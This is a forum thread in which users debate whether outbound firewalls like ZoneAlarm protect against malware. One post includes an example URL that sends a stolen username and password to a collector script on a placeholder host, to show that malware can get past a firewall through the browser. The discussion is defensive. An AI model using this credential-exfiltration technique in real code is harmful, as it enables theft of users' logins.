Oh dear, some people aren't reading what's been written.
My remarks were qualified in several ways. If I gave the impression that any outbound firewall was 100% effective I apologise, but I did say "that nothing - no AV, no Internet Security package, whatever" is 100% effective. So to be clear, that includes upstream Firewalls.
I'm fairly familiar, as I expect you are, with Steve Gibson's site, those and some other "test" routines and various shortcomings.
However, no virus or malware is likely to solely contain similar code to that which you have exampled (eg. it needs to have a keylogger, search for email addresses, or whatever) as it also needs to be giving the hacker some "useful" data. It would therefore be hoped that it would get detected by antivirus or anti-malware products. I'm also sure that malware writers and hackers will be familiar with such code, although would be hackers may not be, so why make it easier for them by giving unnecessary prominence to specific code in a public domain. Furthermore considering that was written in 2001 (and based on grc.com as it was then), it no longer reliably tells you about it's successful penetration, in fact the reverse, to a non-techie person it can give the false impression that there was no "leak". For these two reasons alone, I consider it irresponsible to highlight such code (by name and/or link) and in a public domain and you ought to delete it from your post. (If you really thought I was unaware of such code you could have sent the link in a PM).
I have no problem with you (or anyone) stressing that that upstream firewalls have limited benefits.
No-one should stupidly think that they are going to be 100% protected by any security product.  Anit-virus and Anti-Malware software should be kept upto date and full scans run regularly and backups done regularly.
As was mentioned by Reed, an upstream firewall may tell you things you might not otherwise have been aware of. Eg. the tray icon will show traffic (even running that test) , which if not expected, indicates some thing amiss. If you don't allow it to totally configure itself and manually configure it, you can get warnings of potential traffic. Some protection/warning is better than none!
In the case of that test,  a techie user my spot that although it can give the wrong answer about it's success, if you run a task manager you will see instances of iexplore running that haven't been initiated by the user, also if IE is not the default browser, you can end up with a pop-up reminding you of that and asking if you want to make it the default, again indicating something amiss when you didn't start IE yourself.

It's not that I'm not reading what you've written, it's just that I don't agree with all of it.
I wasn't disagreeing with what you'd said about programs not providing 100% protection, but presumably if I'd quoted a part of what you'd said, then you'd complain about it being taken out of context. You suggested that malware would have to have a lot of code, presumably different code to bypass each different firewall it might encounter, and that this would be unlikely. I was just pointing out the malware doesn't need to have some sort of special code to defeat each particular firewall, it could just use your web browser. That particular program I pointed out happens to use internet explorer, but perhaps malware wouldn't even need to do that. How about stealing a login and password by just launching the default handler for http URLs and opening http://www.example.com/datacollectorscript.php?stolenusername=abc&stolenpassword=xyz - maybe not particularly subtle, but maybe it doesn't need to be. Oh dear, I suppose I'm going to be in trouble again for assisting malware authors.
I'm not sure you've really taken into consideration the point about for your outbound firewall to protect you from something, that something is already running on your computer. It's already been missed by the user and the anti-virus / anti-malware software, there's not much point hoping it would have been detected by those when they've already missed it.
Suggesting I should remove the link or not even mention its name seems to be a bit of an overreaction. That I might somehow be aiding malware writers who would be reading this forum but can't use a search engine is ridiculous. Perhaps you should get that website shut down, or perhaps ask the IWF or Plusnet to have it blocked so that people can't access it? I was hoping that people would read that website and get an idea of the concept of that program, rather than just wildly run it.
Monitoring upstream traffic, and what processes are running, could be done perfectly well with Windows built-in task manager, or it you want to monitor network activity, perhaps use netstat or TCPView.
The original question was about the value of a firewall like zonealarm, not just whether it might possibly provide some benefit. I think its overall value has to take into consideration the problems we were told it had caused, weighed against any potential benefit, and which of those someone considers to be greater is probably going to be subjective.

Welcome back, Anotherone, I've been missing you as you have not been around these forums for ages. 
My impression of Anotherone is that he tends to be knowledgeable and to have strongly-voiced opinions.  I often used to disagree with him but then the debate forced us to explore issues in greater depth than might otherwise have happened  - which was a good thing.  I don't recall ever being quoted so favourably by him hitherto.